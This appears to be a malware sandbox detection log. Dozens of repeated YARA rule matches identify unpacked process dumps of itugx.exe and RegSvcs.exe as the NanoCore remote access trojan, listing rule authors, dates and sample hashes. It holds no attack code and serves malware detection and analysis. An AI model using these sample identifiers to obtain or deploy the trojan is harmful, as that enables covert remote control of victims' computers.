Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
